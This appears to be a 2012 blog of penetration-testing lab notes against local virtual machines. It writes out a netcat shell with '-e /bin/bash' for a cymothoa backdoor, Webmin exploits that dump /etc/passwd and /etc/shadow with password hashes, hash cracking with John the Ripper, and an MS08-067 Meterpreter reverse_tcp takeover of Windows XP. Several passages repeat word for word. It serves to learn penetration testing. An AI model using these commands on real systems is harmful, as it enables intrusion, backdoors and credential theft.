In this case is situatuation we have access to setup backdoor to victim, I type
nc -l -v -p 8888 -e > cy /bin/bash
in Backtrack terminal with position at
root@bt:/pentest/backdoors/cymothoa#
And move to terminal victim target and type
:~$ nc 192.168.56.1 8888 -e > cy /bin/bash
and look what happend in backtrack console
Position backtrack has listening and connect to victim
and I move to victim console
I type ls to look list at this directory and I execute cymothoa file with command ./cymothoa
I have running cymothoa in victim terminal, I suppose I can to next treat to setup backdoor at this console, and this is my opinion.
After enterance in cymothoa I type
ps -axu
to look prosess running
And runing cymothoa with syntax
./cymothoa -p (process ID of bash shell) -s 0 (option for bash shell) -y (port in listing on backtrack)
./cymothoa -p 20575 -s 0 -y 8888
Already infected on shell prosess.
But I still confused with this condition, I suppose this is backtrack infected by Uubuntu!? or Ubuntu already infected by BacktrackCymothoa!?
Tuesday, January 31, 2012
Crack Password with John The Ripper
After we found hash password we must to crack it for look real password, at this time I wanna try to crack password from past case
I use John The Ripper
After open john, I choose to copy file with name userpass (txt) to john's folder cause in article said is can increase time when crack password, the I crack this password like this
After I wait for crack file is not have result and I think this is too long hash so I decided to use one hash to be cracked with john the ripper
I wait for long time not have result, and I choose to aborted the treat, cause I this this not have password matched in dictionary list of password.
I use John The Ripper
After open john, I choose to copy file with name userpass (txt) to john's folder cause in article said is can increase time when crack password, the I crack this password like this
After I wait for crack file is not have result and I think this is too long hash so I decided to use one hash to be cracked with john the ripper
I wait for long time not have result, and I choose to aborted the treat, cause I this this not have password matched in dictionary list of password.
Exploitation to Previlege Escalation
Information Gathering
Zenmap to look up service and port has open or run
MAC Address: 08:00:27:F9:C1:BB (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:kernel:2.6.22
OS details: Linux 2.6.22 (embedded, ARM)
Uptime guess: 0.021 days (since Mon Jan 30 17:27:33 2012)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=209 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:kernel
Host script results:
| nbstat:
| NetBIOS name: UBUNTUVM, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
| Names
| UBUNTUVM<00> Flags: <unique><active>
| UBUNTUVM<03> Flags: <unique><active>
| UBUNTUVM<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| MSHOME<1d> Flags: <unique><active>
| MSHOME<1e> Flags: <group><active>
|_ MSHOME<00> Flags: <group><active>
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-security-mode:
| Account that was used for smb scripts: guest
| User-level authentication
| SMB Security: Challenge/response passwords supported
|_ Message signing disabled (dangerous, but default)
| smb-os-discovery:
| OS: Unix (Samba 3.0.26a)
| Computer name: ubuntuvm
| Domain name: nsdlab
| FQDN: ubuntuvm.NSDLAB
| NetBIOS computer name:
|_ System time: 2012-01-31 00:58:10 UTC-6
TRACEROUTE
HOP RTT ADDRESS
1 0.52 ms 192.168.0.21
NSE: Script Post-scanning.
Initiating NSE at 17:58
Completed NSE at 17:58, 0.00s elapsed
Read data files from: /usr/local/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.16 seconds
Raw packets sent: 1020 (45.626KB) | Rcvd: 1016 (41.358KB)
From that I suppose that web application is running so I check to that IP in my browser and I found Web page it that server is active, so I want to penetrate this server with anything from web
Vulnerability Assesment and Indentification
Then the Nessus Vulnerability Scanning
Given the level of vulnerability on the target and see more details of services running
Following up on port 10000 on the web application
Results of Nessus Webmin application states has a gap
Given the level of vulnerability on the target and see more details of services running
Following up on port 10000 on the web application
Results of Nessus Webmin application states has a gap
Exploitation
Metasploit
msf > search webmin
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/admin/webmin/file_disclosure 2006-06-30 normal Webmin file disclosure
msf > use auxiliary/admin/webmin/file_disclosure
msf auxiliary(file_disclosure) > set RHOST 192.168.0.21
RHOST => 192.168.0.21
msf auxiliary(file_disclosure) > set LPORT 10000
LPORT => 10000
msf auxiliary(file_disclosure) > set LHOST 192.168.0.27
LHOST => 192.168.0.27
msf auxiliary(file_disclosure) > exploit
[*] Attempting to retrieve /etc/passwd...
[*] The server returned: 200 Document follows
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
dhcp:x:100:101::/nonexistent:/bin/false
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
mysql:x:103:107:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash
obama:x:1001:1001::/home/obama:/bin/bash
osama:x:1002:1002::/home/osama:/bin/bash
yomama:x:1003:1003::/home/yomama:/bin/bash
After seeing the contents of / etc / passwd I have not managed to get my password and user should try to use the exploit-DB by searching for keywords Webmin which I suspect has a gap
I tried with the way the exploit Exploit-BD
root@bt:/pentest/exploits/exploitdb# ./searchsploit webmin
Description Path
--------------------------------------------------------------------------- -------------------------
Webmin BruteForce and Command Execution Exploit /multiple/remote/705.pl
Webmin Web Brute Force v1.5 (cgi-version) /multiple/remote/745.cgi
Webmin BruteForce + Command Execution v1.5 /multiple/remote/746.pl
Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit /multiple/remote/1997.php
Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit (perl) /multiple/remote/2017.pl
phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability /php/webapps/2451.txt
phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability /php/webapps/2451.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities /php/webapps/2462.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities /php/webapps/2462.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities /php/webapps/2462.txt
root@bt:/pentest/exploits/exploitdb# perl platforms/multiple/remote/2017.pl 192.168.0.21 10000 /etc/shadow 0
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 192.168.0.21 on port 10000!
FILENAME: /etc/shadow
FILE CONTENT STARTED
-----------------------------------
root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
daemon:*:14040:0:99999:7:::
bin:*:14040:0:99999:7:::
sys:*:14040:0:99999:7:::
sync:*:14040:0:99999:7:::
games:*:14040:0:99999:7:::
man:*:14040:0:99999:7:::
lp:*:14040:0:99999:7:::
mail:*:14040:0:99999:7:::
news:*:14040:0:99999:7:::
uucp:*:14040:0:99999:7:::
proxy:*:14040:0:99999:7:::
www-data:*:14040:0:99999:7:::
backup:*:14040:0:99999:7:::
list:*:14040:0:99999:7:::
irc:*:14040:0:99999:7:::
gnats:*:14040:0:99999:7:::
nobody:*:14040:0:99999:7:::
dhcp:!:14040:0:99999:7:::
syslog:!:14040:0:99999:7:::
klog:!:14040:0:99999:7:::
mysql:!:14040:0:99999:7:::
sshd:!:14040:0:99999:7:::
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::
Now I managed to go in and open a shadow file in / etc / shadow in server target, and to next step we need to treat crack password from that hash password
Saturday, January 28, 2012
Metasploit With The Systematic Hacking Step
This articel is for addjusment Articel about Metasploit
Information Gathering :
Use Zenmap to identification specification data of target.
Result of scanning is :
Initiating SYN Stealth Scan at 03:28
Scanning 2 hosts [1000 ports/host]
Discovered open port 135/tcp on 192.168.56.102
Discovered open port 139/tcp on 192.168.56.102
Discovered open port 445/tcp on 192.168.56.102
Completed SYN Stealth Scan against 192.168.56.102 in 1.33s (1 host left)
Completed SYN Stealth Scan at 03:28, 8.25s elapsed (2000 total ports)
Initiating Service scan at 03:28
Scanning 3 services on 2 hosts
Completed Service scan at 03:28, 6.01s elapsed (3 services on 2 hosts)
Initiating OS detection (try #1) against 2 hosts
Retrying OS detection (try #2) against 192.168.56.100
NSE: Script scanning 2 hosts.
Initiating NSE at 03:29
Completed NSE at 03:29, 0.02s elapsed
Nmap scan report for 192.168.56.100
Host is up (0.000064s latency).
All 1000 scanned ports on 192.168.56.100 are filtered
MAC Address: 08:00:27:D4:42:4C (Cadmus Computer Systems)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.06 ms 192.168.56.100
Nmap scan report for 192.168.56.102
Host is up (0.00055s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
MAC Address: 08:00:27:5F:41:EC (Cadmus Computer Systems)
Device type: general purpose
Running: Microsoft Windows XP
OS CPE: cpe:/o:microsoft:windows_xp
OS details: Microsoft Windows XP SP2 or SP3
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=252 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| nbstat:
| NetBIOS name: XXX-8ADCB030A79, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:5f:41:ec (Cadmus Computer Systems)
| Names
| XXX-8ADCB030A79<00> Flags: <unique><active>
| WORKGROUP<00> Flags: <group><active>
| XXX-8ADCB030A79<20> Flags: <unique><active>
|_ WORKGROUP<1e> Flags: <group><active>
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-security-mode:
| Account that was used for smb scripts: guest
| User-level authentication
| SMB Security: Challenge/response passwords supported
|_ Message signing disabled (dangerous, but default)
TRACEROUTE
HOP RTT ADDRESS
1 0.55 ms 192.168.56.102
In Zenmap result we can look indentification of Target specify.
Important informasion is :
Nmap scan report for 192.168.56.102
OS details: Microsoft Windows XP SP2 or SP3
For next step is
Service Enumeration :
Result of Zenmap is
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
We can look service running on target system.
And next is
Vulnerability Assessment and Identification :
I use Nessus to identification Vulnerability of target
result of nessus is
We can look 2 point of vulnerability has found, and I try to expose it
I found so interest vulnerability here, I want to try exploit it to target in Metaploit
Exploitation :
I use Metasploit Console to exploit target, open terminal and type : msfconsole
And next step is matched vulnerability Assesment and Identification data from Nessus to use in Metasploit, previous I had found most interest vulnerability is MS08-067
And try to Meterpreter step to use exploit MS08-067 with command
use exploit/windows/smb/ms08_067_netapi
After choose exploit we need to set payload with command
set PAYLOAD windows/meterpreter/reverse_tcp
and set LHOST and RHOST
LHOST is My IP
RHOST is Target IP
Information Gathering :
Use Zenmap to identification specification data of target.
Result of scanning is :
Initiating SYN Stealth Scan at 03:28
Scanning 2 hosts [1000 ports/host]
Discovered open port 135/tcp on 192.168.56.102
Discovered open port 139/tcp on 192.168.56.102
Discovered open port 445/tcp on 192.168.56.102
Completed SYN Stealth Scan against 192.168.56.102 in 1.33s (1 host left)
Completed SYN Stealth Scan at 03:28, 8.25s elapsed (2000 total ports)
Initiating Service scan at 03:28
Scanning 3 services on 2 hosts
Completed Service scan at 03:28, 6.01s elapsed (3 services on 2 hosts)
Initiating OS detection (try #1) against 2 hosts
Retrying OS detection (try #2) against 192.168.56.100
NSE: Script scanning 2 hosts.
Initiating NSE at 03:29
Completed NSE at 03:29, 0.02s elapsed
Nmap scan report for 192.168.56.100
Host is up (0.000064s latency).
All 1000 scanned ports on 192.168.56.100 are filtered
MAC Address: 08:00:27:D4:42:4C (Cadmus Computer Systems)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.06 ms 192.168.56.100
Nmap scan report for 192.168.56.102
Host is up (0.00055s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
MAC Address: 08:00:27:5F:41:EC (Cadmus Computer Systems)
Device type: general purpose
Running: Microsoft Windows XP
OS CPE: cpe:/o:microsoft:windows_xp
OS details: Microsoft Windows XP SP2 or SP3
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=252 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| nbstat:
| NetBIOS name: XXX-8ADCB030A79, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:5f:41:ec (Cadmus Computer Systems)
| Names
| XXX-8ADCB030A79<00> Flags: <unique><active>
| WORKGROUP<00> Flags: <group><active>
| XXX-8ADCB030A79<20> Flags: <unique><active>
|_ WORKGROUP<1e> Flags: <group><active>
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-security-mode:
| Account that was used for smb scripts: guest
| User-level authentication
| SMB Security: Challenge/response passwords supported
|_ Message signing disabled (dangerous, but default)
TRACEROUTE
HOP RTT ADDRESS
1 0.55 ms 192.168.56.102
In Zenmap result we can look indentification of Target specify.
Important informasion is :
Nmap scan report for 192.168.56.102
OS details: Microsoft Windows XP SP2 or SP3
For next step is
Service Enumeration :
Result of Zenmap is
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
We can look service running on target system.
And next is
Vulnerability Assessment and Identification :
I use Nessus to identification Vulnerability of target
result of nessus is
We can look 2 point of vulnerability has found, and I try to expose it
I found so interest vulnerability here, I want to try exploit it to target in Metaploit
Exploitation :
I use Metasploit Console to exploit target, open terminal and type : msfconsole
And next step is matched vulnerability Assesment and Identification data from Nessus to use in Metasploit, previous I had found most interest vulnerability is MS08-067
And try to Meterpreter step to use exploit MS08-067 with command
use exploit/windows/smb/ms08_067_netapi
After choose exploit we need to set payload with command
set PAYLOAD windows/meterpreter/reverse_tcp
and set LHOST and RHOST
LHOST is My IP
RHOST is Target IP
set LHOST 192.168.56.1 < < My IP
set RHOST 192.168.56.102 < < Target IP
and type exploit to start exploitation target
After we on meterpreter mode its mean we has make hole to taget system with payload we used, now we need to enter C:\ on system32 to full takedown target system
use syntax
meterpreter > execute -M -f cmd.exe
This command mean we make system execute command prompth on system (XP) and afte that we enter to system32 target
And Finally I success to enter system of XP with meterpreter Metasploit.Use Offline Database Exploit on Exploit-db
Use Exploit-DB at Bactrack is offline weapon of exploit in local database, Bactrack Tools > Exploitation Tools > Open Source Exploitation > Exploit-DB > Exploit-BD Search
To search exploit we can use ./searchploit <name exploit>
For example I want to find out about smb exploit
./searcploit smb
I can found so many exploit for smb, for use it we need to match vulnerability target with nessus, from Nessus article, to Open exploit, we can look extension exploit, if py its mean that file base writen with python and we can use syntax python <name exploit> for rb its mean ruby file, C is base writen on C we need to compile that script exploit, if that pl its mean writen with perl and use perl <name file exploit>
We can open exploit file with command "cat"
I'll try one of that file for example
and result of that is
That exploit is for VLC media player, we can use it if target have same match vulnerability.
Vulnerability Report on Nessus
First I was scanning network in class with name test1
Click on Test1 and press "Browse" and we'll see detail of target scanning
We can see how much point of vulnerability of target, click on IP for see more detail
And we can download detail of result with option "download report", choose type of page saved, I choose "detail HTML report" and this is report of that page in this link : Nessus Report
Click on Test1 and press "Browse" and we'll see detail of target scanning
We can see how much point of vulnerability of target, click on IP for see more detail
And we can download detail of result with option "download report", choose type of page saved, I choose "detail HTML report" and this is report of that page in this link : Nessus Report
Metasploit on Backtrack 5
Now I'll try to use metasploit console to exploitation windows XP sp 3 on Virtualbox, f irst we need to know information about victim, in penetration testing know as Informaton Gathering, we can use nmap, Zenmap or ect to scanning candidate victim on network.
Scanning Network
We can know any user active on network with IP 192.168.56.102 and after get IP we need to scanning vulnerability target, now I use Nessus
After open Nessus fill Name Target, Policy, and fill Scan Target with IP's victim
Press scan and wait till finish result
We can see vulnerability of victim is have 2 high risk vulnerability, press on port 445 and look deeply information like this
I look 2 vulnerability and choose a 2nd plugin I have, I was try to exploit first option and fail exploitation it, and I choose 2nd option this is
Plugin name is MS08-067, I try to find information about that plugin vulnerability on google and find at metaploit payload description, and try to explit it, and next open metaploit console with command on terminal #msfconsole
Use exploit match with nessus result and syntax in metasploit is
Scanning Network
We can know any user active on network with IP 192.168.56.102 and after get IP we need to scanning vulnerability target, now I use Nessus
After open Nessus fill Name Target, Policy, and fill Scan Target with IP's victim
Press scan and wait till finish result
We can see vulnerability of victim is have 2 high risk vulnerability, press on port 445 and look deeply information like this
I look 2 vulnerability and choose a 2nd plugin I have, I was try to exploit first option and fail exploitation it, and I choose 2nd option this is
Plugin name is MS08-067, I try to find information about that plugin vulnerability on google and find at metaploit payload description, and try to explit it, and next open metaploit console with command on terminal #msfconsole
Use exploit match with nessus result and syntax in metasploit is
use exploit/windows/smb/ms08_067_netapi
After choose exploit we need to set payload with syntax
set PAYLOAD windows/meterpreter/reverse_tcp
After set Payload we need to determine Local Host and target use syntax
set LHOST 192.168.56.1 < < My IP
set RHOST 192.168.56.102 < < Target IP
and execute Exploit with syntax
exploit
To enter meterpreter mode
After we on meterpreter mode its mean we has make hole to taget system with payload we used, now we need to enter C:\ on system32 to full takedown target system
use syntax
meterpreter > execute -M -f cmd.exe
This command mean we make system execute command prompth on system (XP) and afte that we enter to system32 target
For prove we have taken over our system proved to create a folder in C:\
Use command mkdir is2c in C:\> to make folder on C:\
And success to make folder in C:\ that mean we has take over XP system.
Subscribe to:
Posts (Atom)